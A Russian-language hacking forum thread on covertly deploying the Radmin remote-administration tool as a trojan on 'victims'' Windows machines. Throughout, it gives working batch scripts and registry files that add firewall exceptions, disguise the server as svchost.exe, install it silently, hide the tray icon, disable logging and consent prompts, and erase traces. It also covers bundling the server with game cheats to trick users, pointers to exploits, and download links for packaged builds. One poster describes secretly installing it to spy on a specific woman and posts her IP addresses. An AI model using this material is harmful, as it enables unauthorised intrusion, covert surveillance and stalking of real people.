Зачем еще в реестр лазить, если у меня и так прога нигде не палится. Мне просто ее нужно самому на чужом компе активировать, т.е. запустить.

Зачем еще в реестр лазить, если у меня и так прога нигде не палится. Мне просто ее нужно самому на чужом компе активировать, т.е. запустить.
Проверял на windows 2003 (3SP) не работает.

Как вариант попробуйте 3-ую версию, или собрать свой.
Также альтернативой можно использовать руткид.

подскажите плиз нубу т.е. мне :
я тут одним трояном заинтересовался(radmin 3.2) faq и все прилагающееся прочитал но понял меньше половины разъясните плиз:
1. там два инсталера было один viewer второй server. так сервер у ся распаковывать или у жертвы.если у ся то жертве скидывать r_server.exe AdmDll.dll raddrv.dll правильно?2.как етот сервер настроить?
3.пасс где найти смотрел в топиках так они все нерабочие мож есть программа какая (тада как ей пользоваться!
4.объясните как инсталером объединить 2 программы чтоб жертва установила и софт(желаемый) и сервер ?
5.как и куда скрипты прописывать чтоб у жертвы не логилась прога и чтоб из треи исчезла!?ах да и чтоб неспрашивала жертвы у разрешение на взлом?

>2.как етот сервер настроить?
r_server.exe /setup конфиг. сохраняется в реестре...

>3.пасс где найти смотрел в топиках так они все нерабочие мож есть программа какая >(тада как ей пользоваться!

Вопрос не понял...

>4.объясните как инсталером объединить 2 программы чтоб жертва установила и >софт(желаемый) и сервер ?

Поищи джойнеры ...

>5.как и куда скрипты прописывать чтоб у жертвы не логилась прога и чтоб из треи >исчезла!?ах да и чтоб неспрашивала жертвы у разрешение на взлом?

Вот список ключей в реестре:
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters]
"NTAuthEnabled" - авторизация по юзеру (0-входит любой)
"Parameter" - пароль
"DisableTrayIcon" - 0 - без иконки в трее
"Port" - (стандартный порт сервера 4899)
"EnableLogFile" - 0 - отключено ведение логов
"LogFilePath" - пкть к логфайлу
"FilterIp" - фильтр айпишников.
"AskUser" - 0 - не спрашивать у юзверя разрешение на взлом =]

так куда прописывать етот список ключей?
как сделать так чтоб жертва устанавливала прогу и сервер за одно для версии 3.2?

так куда прописывать етот список ключей?
как сделать так чтоб жертва устанавливала прогу и сервер за одно для версии 3.2?


Сохрани в *.reg и запускай ....
либо Пуск -> Выполнить => regedit.exe
там поэксперементируй ... хоть появится представление работы с реестром

regedit.exe это в компе жертвы запускать надо или на своем?
а как запускать чениб на компе жертвы?чета слышал про телнет,мож пояснит кто как его настроить и т.д. и т.п.
сор за бестактный вопрос :список ключей в реестре сохранить в reg? а как?где он?наверняка я оч назойлив но один раз рассказав что где жать и больше не пришлось бы!

Теперь и у меня вопрос... стоит ли переплетать свой пак радмина 2.1
на более новый типа 3.2 ... меньше ли будет "палева"... (дружелюбны ли антивиры к этой версии?)
да и накладок с конфигурацией не будет ли?....

по сути же то же самое ... пара dll , 1-а exe шка...
+ прописать настройки в реестр.. ?

в 3 версии видеодрайвер работает как-то по другому. Пробовал собрать под новую версию, получилась только передача файлов

Есть у кого нибуть крек или рабочий серийник для радмина 3.2?

что нужно прописать в телнете чтобы у жертвы в процессах не отображался r_server!?
как заставить жертву запустить server без соц.инженирии?

что нужно прописать в телнете чтобы у жертвы в процессах не отображался r_server!?
как заставить жертву запустить server без соц.инженирии?
причем тут telnet к радмину? если ты хочешь чтоб в процессах не было r_server просто переименуй его например в svchost

да я его даже настроить не могу ! скачал готовый пак тут же на форуме !он сам распаковывается в систем!проста в viewerе есть такая функция телнет я думал мож ей надо как то воспользоваться ?мож кто расскажет как такой архивчик создать и пасс свой поставить!пишите в личку плз!
мож есть какие ниб другие способы проникнуть на комп (XP) кроме как троем?поделитесь!ну или хотя б че ниб предложите по сетевому хаку !

я так понял что нужно 4 файла : батник(111) такого сожержания в sfx архиве!:


@echo off
echo FATAL ERROR! PLEASE, WAIT TO CONTINUE...
netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"
reg import 111.reg
regedit /s 111.reg
"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start

а вот что в файле 111.reg?

а исправьте чтоб етот архив после запуска сам и удаляся!расскажите что нужно сделать чтоб руткит вместе с radminом ставился может расскажете мне!

у меня была трабла:
у человека на порту 4899 стоял r_server
я закинул ему еще два переименованых радмин сервера переименованых в svchost работающих на 4898 и 4897 портах
настроил эти два через командную строку путем следующих команд:
%SYSTEMROOT%/help\svchost.exe /install /silence
%SYSTEMROOT%/help\svchost.exe /port:4898 /pass:tratata /save /silence
%SYSTEMROOT%/help\svchost.exe /start
и
%SYSTEMROOT%/config\svchost.exe /install /silence
%SYSTEMROOT%/config\svchost.exe /port:4897 /pass:tratata /save /silence
%SYSTEMROOT%/config\svchost.exe /start


в каждую директорию закидывал три файла:
svchost.exe
AdmDll.dll
raddrv.dll

собственно сама проблема с серверами на портах 4898 и 4897:
через обмен файлов и телнет конектилось отлично но "управление" и "просмотр" не работали.
после ввода пароля появлялась заставочка как при загрузке экрана и потом просто исчезала

версия сервера 2.2 версия клиента 3.2

при этом на 4899 портустоит такая точно 2.2 версия и она нормально работает

как думаете в чем может быть проблема?

з.ы. а сегодня сервера работать перестали ( видимо ктото спалил их нодом (








я так понял что нужно 4 файла : батник(111) такого сожержания в sfx архиве!:


@echo off
echo FATAL ERROR! PLEASE, WAIT TO CONTINUE...
netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"
reg import 111.reg
regedit /s 111.reg
"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start

а вот что в файле 111.reg?

а исправьте чтоб етот архив после запуска сам и удаляся!расскажите что нужно сделать чтоб руткит вместе с radminом ставился может расскажете мне!
содержание файла 111.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplis t]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters]
"NTAuthEnabled"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"Port"=hex:23,13,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
"Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5,89,e4, b9,49,c8,49,00,1c,eb,\
18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74 ,94,4f,49,42,46,f7,ab,05,\
1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28

факю по файлам бат и рег в первых двух постах этой темы



чтобы файлы удалялись прописываешь в бат файле в конце:

del xxx.xx

где xxx.xx название файла который надо удалить


лично у меня бат файл был следующего содержания:

@echo off
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
добавление в встроеный в винду файрвол исключения
netsh firewall add allowedprogram "%Windir%\help\svchost.exe" "Remote Administrator Server" ENABLE
открытие нужного порта (у меня без этого не всегда работало) во все том же файрволе:
netsh firewall add portopening TCP 4897 svchost
копируем имеющиеся ключи реестра в файлик 123.reg :
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
удаляем имеющиеся ключи реестра:
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
копируем нужные файлы в нужную директорию:
copy /y "svchost.exe" "%SYSTEMROOT%/help\svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/help\raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/help\admdll.dll"
добавляем в реестр то что нам надо из файлика 111.reg:
reg import 111.reg
regedit /s 111.reg
устанавливаем сервер без уведомлений пользователя:
"%SYSTEMROOT%/help\svchost.exe" /install /silence
настраиваем сервер на 5001 порт, ставим пароль 123 без уведомления пользователя:
"%SYSTEMROOT%/help\svchost.exe" /port:5001 /pass:123 /save /silence
запускаем сервер:
"%SYSTEMROOT%/help\svchost.exe" /start
удаляем все что мы использовали для установки:
del svchost.exe
del raddrv.dll
del AdmDll.dll
del 111.reg
del 123.reg
del start.bat

Помогите доработать способ подмены настоящего файла радмины на поддельный, чтоб не пропалили.
Вобщем забацал я сервак радмина так что он при любом подключении синего цвета и даже если на него нажать он все равно пишет Нет соединений. Теперь надо подменить реальный на мой. Я делал так:

taskkill /im r_server.exe /f
del C:\WINDOWS\system32\r_server.exe
.
.
{эту строку я продублировал 100 раз}
.
.
del C:\WINDOWS\system32\r_server.exe
copy /y "r_server.exe" "%SYSTEMROOT%\system32\r_server.exe"
"%SYSTEMROOT%\system32\r_server.exe" /start
del C:\r_server.exe
del C:\start.bat

Затем сохраняю его с именем start.bat, пакую батник и мой файл сервака винраром в sfx. При упаковке настраиваю чтоб распаковывался на диск С. Ставлю галочку Скрывать все и перезаписывать существующие фалы.
Остается только приконектится к жертве через телнет и перепись файлов (ПРИ ЭТИХ ПОДКЛЮЧЕНИЯХ ЦВЕТ ИКОНКИ РАДИНА НЕ МЕНЯЕТСЯ). Закидываю файл, запускаю и отсоединяюсь. Через секунд 15 обратно присоединяюсь через Перепись файлов и снова копирую файл r_server.exe чтобы проверить подменился он или нет. Если это мой то все олично. Отключаю звук при подключении и можно смело наблюдать за действиями пользователя. Всегда когда я так делал все работало, НО на одном компе это не проходит. Не могу понять почему. Может кто подскажет как усовершенствовать этот метод?
попробуй так:

"%SYSTEMROOT%\system32\r_server.exe" /stop
del C:\WINDOWS\system32\r_server.exe
copy /y "r_server.exe" "%SYSTEMROOT%\system32\r_server.exe"
"%SYSTEMROOT%\system32\r_server.exe" /start
del C:\r_server.exe
del C:\start.bat


4.объясните как инсталером объединить 2 программы чтоб жертва установила и софт(желаемый) и сервер ?

в файлике 111.bat пипешь строку:
xxx.xx
где xxx.xx - имя файла который надо запустить. например install.exe

как вариант можно в архиве сделать все файлы кроме собственно батника скрытыми
много народу юзает проводник где по дефолту не показываются скрытые файлы...

На компе существует уже установленный радмин, после запуска радмина-трояна пароль и порт другие, старый радмин вырубился и незапускаеться. Вопросто такой можно ли использовать 2 радмина нормальный и трой одновременно , если да то как ???

На компе существует уже установленный радмин, после запуска радмина-трояна пароль и порт другие, старый радмин вырубился и незапускаеться. Вопросто такой можно ли использовать 2 радмина нормальный и трой одновременно , если да то как ???
Юзать разные порты.

Юзать разные порты.

так я же написал что порт я установил другой

"C:\WINDOWS\Help\svchost.exe" /port:5001

Зы= кстати на виндовс сервер нужно прописывать конкретный путь

Или нужно в самом реестре устанавливать???

На компе существует уже установленный радмин, после запуска радмина-трояна пароль и порт другие, старый радмин вырубился и незапускаеться. Вопросто такой можно ли использовать 2 радмина нормальный и трой одновременно , если да то как ???
туплю
ты реестр трогал?

Пару вопросиков:
1) в РАдмине в telnet вместо киилицы иероглифы, как исправить?
2) Как удалить логи радмина и логи window\system32\config\...

Пару вопросиков:
1) в РАдмине в telnet вместо киилицы иероглифы, как исправить?
2) Как удалить логи радмина и логи window\system32\config\...


1. мб "chcp 1251" ?!

если бы

Статья кульная!!! ТС респект ! =)

Юзать разные порты.
Интересно .. как ты будешь юзать разные порты...
если конфиг в реестре и в одной ветке... =\

Intro

Допустим, вы хакнули систему сплоитом(MS09-039_RPC-3, ms04-011, и др.)..
а мануал бы к е этим сплоитам(MS09-039_RPC-3, ms04-011, и др.) ну и конечно где их самих взять

а мануал бы к е этим сплоитам(MS09-039_RPC-3, ms04-011, и др.) ну и конечно где их самих взять
http://milw0rm.com/

http://milw0rm.com/
да я новичекв этом деле
мне б сплоит с хелпом как им пользоваться

Может вопрос был но я все не перечитал :
Как декодировать пароль радмина ?

Может вопрос был но я все не перечитал :
Как декодировать пароль радмина ?
никак

Нужна ваша помощь, вообщем ситуация следующая, установил я кринтованный радмин, взятый тут, все хорошо все устраивает, только одно но, при видеозахвате не отображаеться флеш видео, то что транслируеться с камеры, на компьютере жертвы, причем если устанавливать радмин сервер 3.2 то все отображаеться как надо, но 3.2 радмин по понятным причинам не подойдет...вообщем как решить данную проблему, можно ли установить драйвер видеозахвата 3.2 версии в уже установленный мною радмин или какие еще могут быть варианты?

что ни у кого никаких идей, никто не может помочь? (

Блин, народ, мне очень срочно надо, что никто ничем не может помочь????

Народ я так и непонял как пароль поменять?
Из поста видно что
"Parameter"=hex:3c,3c,43,4f,43,41,49,4e,3e,3e
Так как поменять пасс ?
пишу свой вот так
"Parameter"=12345
но неполучается
прочитал всю тему так и некто на вопрос неответил!
так как?

Пароль нужно указывать в "hex"
12345 - 31 32 33 34 35
"Parameter"=hex:31,32,33,34,35
google (google.com/search?q=hex%20decode%20encode)

Я пробывал но при смене пасса пароля вообше неставится захожу без пароля!

REG COPY \\ZODIAC\HKLM\SYSTEM\RAdmin HKLM\Software\Hacker
Копирует все параметры раздела RAdmin с компьютера ZODIAC
в раздел HKLM\Software\Hacker на локальном компьютере.

Затем лезем к себе в реестр и копируем значение в *.txt файл.
HKLM\Software\Hacker\v2.0\Server\Parameters]
"Parameter"=??????????????????????????????????
Вот по поводу этого можно по точнее объяснить??
На некоторых компах пробовал сразу пишет - доступ запрещен
А на большенстве других пишет Не найден сетевой путь
выполняю так: в cmd строку пишу: REG COPY \\ip kompa vlokale [xx.xxx.xxx.xxx]\HKLM\SYSTEM\RAdmin HKLM\Software\Hacker
Создал у себя в реестре ветку Hacker в SOFTWARE
ничего не добавляется!!! Что хотите сказать у них (примерно 10 компов пробовал) пути другие к радмину в реестре????

Ребята, а это правда, что 3-я версия практически неуязвим ? Недавно было кнференция и там представители REDMIN так хвалили безопаснотсь. Еще сказали, что выложили в инет и сказали кто сможет подключится - даем приз и никто не смог взломать пароль к серверу.

P.S. Нет ничего неуязвимиго - не катит ? :)

Ребята, а это правда, что 3-я версия практически неуязвим ? Недавно было кнференция и там представители REDMIN так хвалили безопаснотсь. Еще сказали, что выложили в инет и сказали кто сможет подключится - даем приз и никто не смог взломать пароль к серверу.

P.S. Нет ничего неуязвимиго - не катит ? :)
правда

Как сделать, чтобы пароль не спрашивал? Пробую писать 0, а он не двоичный код...
"Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce, 1a
что на что изменить?

Как сделать, чтобы пароль не спрашивал? Пробую писать 0, а он не двоичный код...
"Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce, 1a
что на что изменить?
Тебе вообще пароль не нужен? Просто удали "Parameter" в реестре

Изменил пароль следующим образом:
установил обычный радмин у себя, установил нужный мне пароль в настройках сервера, сохранил строку реестра [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin] в settings.reg

Внутри сети всё работает на ура, развлекаю народ разными флешками. xD
Видимо аутпост и ему подобные, данная коняшка не пробивает, ну раз не видел рабочего стола с иконкой аутпоста в трее, значит и не работает, а вот касппер на многих компах стоит, что и увидел.


Проблема состоит в следующем:
ПК жертвы: известно доменное имя, IP адрес постоянный (внешний и внутренний), пользователь (возможно есть пароль), цвет, модель, операционка Vista Home Premium. использует VPN соединение для инета, как и я, у меня XP Pro SP3.
Отправить эту деревянную коняшку и активизировать на том ПК, не составляет труда, вероятно, скоро будет доступ к этому ПК, но очень на короткое время.
Наличие действующего там RAdmina не определяется... :(
Результат, полное отсутствие результата.
Что посоветуете?
Запись в реестре XP и Vista имеет разницу?

Добрый день!
так у кого получилась эта всё зделать с radmin am 3,2???
если да то подскашите как, потомушта у Радмина 3,2 нет таких ДЛЛак как AdmDll.dll, raddrv.dll

Есть у кого нормальный брут под радмин?

Народ а ктонить может сделать скрытую установку аналога радмин TeamViewer???

Или еще: нужно чтобы имя сервера в процессах r_server.exe было переименовано, допустим в svchost.exe :)

Парни, ни у кого нету Xspider'a версии старше 7.5.2 (крякнутый, конечно). Буду благодарен! =))

С внешкой работает отлично!!! :)
Только в висте пришлось ручками добавлять исключение во встроенный файер, автоматом не встал и работать не давал.

netsh firewall add allowedprogram "%SYSTEMROOT%/svchost.exe" "Remote Administrator Server" ENABLE
Господа, подскажите эту строчку для висты? А то автоматом не добовляется в браунмаудер... :(

Что можно добавить к этому пакету, что бы так же тихо и без палева динамический IP спокойно палить?
Рекомендуют PSSender 1.04 но в инете все ссылки битые, если кто заметит рабочую ссылку, сообщите пожалуйсто.

а что в батнике прописать,чтоб ip жертвы снять снифером?

Здравствуйте Всем.
В сети в одном из компов расшарена стандартная папка SharedDocs,
в нее я залил radmin, что нужно сделать, чтобы удаленно его там установить?

Здравствуйте Всем.
В сети в одном из компов расшарена стандартная папка SharedDocs,
в нее я залил radmin, что нужно сделать, чтобы удаленно его там установить?
Надо cmd-шелл. Можно поробовать сплоитом его получить.

"Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce, 1a

есть какойнибудь hex-редактор, что-бы другой пароль вставить?

Здравствуйте Всем.
В сети в одном из компов расшарена стандартная папка SharedDocs,
в нее я залил radmin, что нужно сделать, чтобы удаленно его там установить?

Как это можно сделать ?! Наверное я сейчас начну тебе учить плохим вещам , но я вижу ты сам этого желаешь ;)
то что ты залили туда своего радмина ещё ничего не значит , он может лежать там годами , и юзер даже если его найдёт то врядли его запустит ! Делается это проще , первые способы я описывал ТУТ (http://forum.antichat.ru/threadnav95505-1-10.html) и ТУТ (http://www.stopxaker-com.na.by/showthread.php?t=175) , но есть ещё более поганенький способ , это впаривание радмиа , то есть , все мы знаем , что в сети очень много читарастов (ух как же я их ненавижу) , так вот берёшь радмин-сервер переименовываешь его в cheats (Super Cheats) и тд , затем кидаешь на файлообменник или в DC++ , и все дела , можно ещё взять Джойнер и склеить своего радмина с читами , тоже не плохой будет результат , вывод честный игрок не будет качать эту хрень , а читерастик да ещё и не опытный с удовольствием скачает и запустит ! :D


Надо cmd-шелл. Можно поробовать сплоитом его получить.

Можно , но у нас в локалке походу админы закрыли 445 порт , сколько я не сканирую сеть , да и не только свою сеть но и другие сети в инете , все сканеры выдают одно и тоже что 445 порт закрыт :( , и я уже давно ни вижу ни одного диапозона с открытым 445 портом !!! (((

Не могу найти SmallSoft LSA Service Exploit , дайти ссылку пожалуйста

Не могу найти SmallSoft LSA Service Exploit , дайти ссылку пожалуйста

Ты что прикалываешься ? тут в теме прикреплённый архив , http://www.stopxaker-com.na.by/showthread.php?t=175

и LSA Service Exploit старая уязвимость года 2004 .

Качай новый Метаспоит !

"Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce, 1a

есть какойнибудь hex-редактор, что-бы другой пароль вставить?
Изменил пароль следующим образом:
установил обычный радмин у себя, установил нужный мне пароль в настройках сервера, сохранил строку реестра [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin] в settings.reg
;)

Можно , но у нас в локалке походу админы закрыли 445 порт , сколько я не сканирую сеть , да и не только свою сеть но и другие сети в инете , все сканеры выдают одно и тоже что 445 порт закрыт :( , и я уже давно ни вижу ни одного диапозона с открытым 445 портом !!! (((
Чё, под видну один сплоит что ли? Анимированные курсоры попробовать можно заюзать, wmf, netapi и т.д...

можно как-то от радмина 3 убрать иконку из трея?

можно как-то от радмина 3 убрать иконку из трея?
[HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server]
"HackRemoveIcon"="1"

Для работоспобности серверной части достаточно трёх файлов:
r_server.exe - сам сервак
AdmDll.dll - необходимая длл
raddrv.dll - длл видео-захвата(без неё будет пахать всё, кроме удалённого раб.стола)
_______________
где взять эти файлы, подскажите плззз!!!

[HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server]
"HackRemoveIcon"="1"
там такого ключа нету.
двоичный раздел создал и строковый - всё равно есть иконка..

Для работоспобности серверной части достаточно трёх файлов:
r_server.exe - сам сервак
AdmDll.dll - необходимая длл
raddrv.dll - длл видео-захвата(без неё будет пахать всё, кроме удалённого раб.стола)
_______________
где взять эти файлы, подскажите плззз!!!
первый пост, ищи архивчег 4.rar

там такого ключа нету.
двоичный раздел создал и строковый - всё равно есть иконка..
но если подключаюсь, через удалённый рабочий стол - не видно.
а если сижу за машиной - есть =\

первый пост, ищи архивчег 4.rar
нашел спсибо....но там сервер 2.0 а у меня стоит 3.2...может подкините 2.0 серв???а то под 3.2 не смогу настроить)

но если подключаюсь, через удалённый рабочий стол - не видно.
а если сижу за машиной - есть =\
Попробовать

reg add HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v3.0\Server\Par ameters /v TrayIconMode /t REG_BINARY /d 01000000 /f


Так же посмотреть:

http://www.radmin.ru/support/forum/read.php?PAGEN_1=1&FID=13&TID=12841&phrase_id=7345655#nav_start

блин такая проблема...сделал всё как надо..подключился сначало с клиент 3,2 и терь больше не хочет..не подскажите в чем дело??

блин такая проблема...сделал всё как надо..подключился сначало с клиент 3,2 и терь больше не хочет..не подскажите в чем дело??
посмотри не мешай там фаервол и т.д.

нет он не мешает....подключится могу 2,0 версии а вот 3,2 не хочет..а поначалу конектился!!

всё сделал!! терь опять же проблема...закинул парню его при конекте просить ввести имя и пароль??

ты смотри что делаеш %

мол зайди сюда ))
надо радикальное что0то делать,своё (имхо) мозг включите

этот порт всегда юзается ,ты своё придумай,если в локалке

ёптыть

svhost.exe /install /silence
2 svhost.exe /port:828 /pass:822930 /save /silence

3 REG ADD HKLM\SYSTEM\RAdmin\v2.1\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
4 REG ADD HKLM\SYSTEM\CurrentControlSet\Services\svhost /v DisplayName /t REG_SZ /d "Service Host Controller" /f

подскажите плз, как быть
вчера поставил жертве радмин вручную с ее же компа(случайно получилось сесть за ее ноут, больше такой возможности в скором времени не приедвидется)
так вот. я поставил сборку 3.1 версии
он проврена, чувак друго юзает ее, всё получается...
но я не могу сконнектиться с ней все равно, IP постоянный, не меняется....
в чем дело, может как-то вьювер настроить мне стоит???
я уже месяц пытаюсь получить доступ к ее компу, и вот удалось засунуть радмин, и вот на те, не коннектиться, все мои ожидания провалились...
спасибо заранее за помощь, если кто знает в чем дело и можно ли теперь с помощью уе установленного там у нее радмина законнектиться. помогите

подскажите плз, как быть
вчера поставил жертве радмин вручную с ее же компа(случайно получилось сесть за ее ноут, больше такой возможности в скором времени не приедвидется)
так вот. я поставил сборку 3.1 версии
он проврена, чувак друго юзает ее, всё получается...
но я не могу сконнектиться с ней все равно, IP постоянный, не меняется....
в чем дело, может как-то вьювер настроить мне стоит???
я уже месяц пытаюсь получить доступ к ее компу, и вот удалось засунуть радмин, и вот на те, не коннектиться, все мои ожидания провалились...
спасибо заранее за помощь, если кто знает в чем дело и можно ли теперь с помощью уе установленного там у нее радмина законнектиться. помогите
Как у неё организован выход в интернет, ADSL? Если так, то модем по-умалчанию в режиме роутер и её комп находится за NAT и своими открытыми портами в Интернет не светит, тоже самое возможно, если на пути стоит какой-либо еще роутер, может файрвол ещё мешать.

ADSL стоит у меня(не в этом же дело?), а у нее нет, у нее сетка. прямее некуда
едиственное, они в общаге универской живут с соседкой и у них инет разветвляет один коммутатор, просто делит инет им, но у каждой, если я не ошибаюсь, должен быть свой IP, но знаю точно, у моей он не меняется...
файера нет вообще...
что можно сделать?

попробуйте сами кто-нить, может получится
у нее ай-пи, первый должен быть, просто она перезжала из одной комнаты в другую, вроде был последний, недавно проверял, но на всяк случ выложил
212.45.8.212
212.45.8.213

у нее стоит радмин, должен же у кого-то законнектиться...

что за сборка 3.1? там хоть значек в трее скрыт? я думаю его тупо удалили

что за сборка 3.1? там хоть значек в трее скрыт? я думаю его тупо удалили

значёк в трее скрывается изминением соответствующего парамерта в реестре.

нет, нигде не отображается, кроме как, процессах единственно маячит, но она ламер
я не стал заморачиваться, скрывая его под другим именем
у меня вьювер 3.1. не сборка, а сам просмотровщик
а сборку сервера могу слить вот она:
http://slil.ru/26511384

это вторая версия и палится она чем угодно, так что скорее всего удалила твой сервак. ну или за натом она. qazer, к чему твой пост я не понял

но этого не может быть, т.к. я проверял его и у себя и у нее ничего не визжало...
что мне сделать лучше подскажи тогда, если не сложно пожалуйста, я попробую добраться к ее ноуту еще раз тогда
если оно того стоит....

Способы описаные в первом посте уже конкртено устарели... Антивирус палит даже батник...

Имеется no tray icon версия Radmin 3.2 (не спрашивайте лучше, как я ее получил), а так же могу подкинуть hidden сборку радмина 2.2, которая самостоятельно устанавливается в системе по двойному клику на ехе-шнике, имеет неограниченную лицензию ;) Ради того, чтобы эту сборку не пустили по рукам - название процесса не изменял, посему в процессах он палится.

Все вопросы - в личку. или на мыло
[ех][собако][prizrak.ws]

Кстати, умники, в 3.1 версии не предусмотрено (как и во всех 3.* версиях) сокрытие иконки, даже если значение в реестре изменить. Скрыть иконку можно двумя путями: либо использовать dll-ку от стороннего разработчика, которая палится каспером, как троян, либо же нарыть NO TRAY ICON версию (попробуйте поищите в инете хехе ))), которая есть у меня, как я уже сказал (там даже в реестр лезть не надо, чтобы убрать иконку, все предусмотрено сразу в настройках =) :p

А... еще обращение к одному умнику: кто сказал, что вторая версия радмина палится чем угодно? ))) ЛОЛ! :D Палится та херня, которая в первом посте

нет, нигде не отображается, кроме как, процессах единственно маячит, но она ламер
я не стал заморачиваться, скрывая его под другим именем
у меня вьювер 3.1. не сборка, а сам просмотровщик
а сборку сервера могу слить вот она:
http://slil.ru/26511384


Дружок, а я то увидел подпись типа smile 1.0 pack, ты случайно сию дивную сборку не с qiq.ru взял? Так вот: автор я, так что твои выходки вроде "я не стал заморачиваться" - галимый понт. Может еще дать ссылку на оригинальный архив, в котором еще есть ридмик? Смотрите и наслаждайтесь http://depositfiles.com/files/1763484 ( Setup1.rar 719.02 KB 2007-09-14) ... Так же имеется сборка, которая устанавливает смайл-пак для QIP, а заодно и радминчика ))) Ссылка на такую сборку: http://depositfiles.com/files/1763750 (Setup2.rar 1.32 MB 2007-09-14)

Посмотрев дату создания файла - можете убедиться, что сборки принадлежат мне

Пароль на архивы: qiq.ru

З.Ы. а за нарушение копирайта можно и бан отхватить

нет, "дружок" и не думал тут понты кидать, просто мне эту сборку скинули, я ее не качал ниоткуда,
я говорю, что не стал заморачивать на сокрытием имени процесса, тут понятно, что имеется ввиду
я, думаю, это можно было бы сделать, если заморочиться.... разве нет???
ни в коей мере не претендую на что-то, просто прошу помощи...
поставил эту сборку ей на комп, а связаться не смог,
если ты сможешь помочь, а я очень рад, что на автора случайно наткнулся
но я не верю в случайности или совпадения...

2 ex3me если автор сборки smile 1.0 pack и она же smile 1.0 Installation NE реально ты !!! Кинь мне в ПМ свою аську , хочу отблагодарить , юзаю её уже пол года , много не обещаю а 5$ на кошель переведу без проблем плюс подгоню хороший дедик ;)

smile 1.0 pack .... AVP сразу выносит... нужно бы криптануть... =\

Можете оценить скрин
http://www.save-img.com/pic.php?id=6a3e9c61211e5ea20e3727fe568857d0
Тут 2 сборки, клиент. Дата заливки соответственно совпадает с той, которую я писал выше.
Думаю этого вполне достаточно для доказательства

2 Vans : KIS 7.0 с базами от 08.01.09 - ничего не видит.

ADSL стоит у меня(не в этом же дело?), а у нее нет, у нее сетка. прямее некуда
едиственное, они в общаге универской живут с соседкой и у них инет разветвляет один коммутатор, просто делит инет им, но у каждой, если я не ошибаюсь, должен быть свой IP, но знаю точно, у моей он не меняется...
файера нет вообще...
что можно сделать?

попробуйте сами кто-нить, может получится
у нее ай-пи, первый должен быть, просто она перезжала из одной комнаты в другую, вроде был последний, недавно проверял, но на всяк случ выложил
212.45.8.212
212.45.8.213

у нее стоит радмин, должен же у кого-то законнектиться...

Скорее всего ты пытаешься законнектиться к ее внутреннему ИП (локалной сети). Если же это не так, то ситуация следующая: в универе стоит сервер (как раз тот ИП что ты указал - это скорее всего его ИП), который раздает инет. На сервере 2 сетевые карты. Одна с локальным ИП, другая с глобальным (т.е. инет) ИП. В инет девушка выходит через сервер!!! Соответственно ты пытаешься законнектится к ИП сервера, а не девушки (ну а на серваке наверное радмин не стоит)

Более подробной картины из имеющихся данных нарисовать не могу.

Выход: узнать ее локальный ИП, и изнутри сети подключиться к нему.

З.Ы. Кому понравился ответ +1 в репу мне =))

1. Смотри:

Внешний IP: 212.45.8.212
Внутренний IP: 127.0.0.1
Порт: 22195

вот что выдал мне QIP, када она мне пересылала файл со своего компа...
может это больше прояснит возожные варианты решения моего вопроса?

2. и еще вопрос...
что значит изнутри сети подключиться к нему... т.е.е через другого клиента их общажного инета?

+-ы уже поставил, тебе итак большой респект от всех, я думаю))

ип на сколько я понял не внутренний. на счет ип-сервара, - было сказанно что после того как она переехала в др. комнату ип сменился, сомневаюсь я что у них под каждую комнату свой прокси\nat :). Скорее всего что-то блокирует радминчег, либо действительно сидят они все через прокси, тогда уже ничего не сделаешь. nat рулит :)
ps: мб туплю, прочел последние 2 страницы темы.

1. Смотри:

Внешний IP: 212.45.8.212
Внутренний IP: 127.0.0.1
Порт: 22195

вот что выдал мне QIP, када она мне пересылала файл со своего компа...
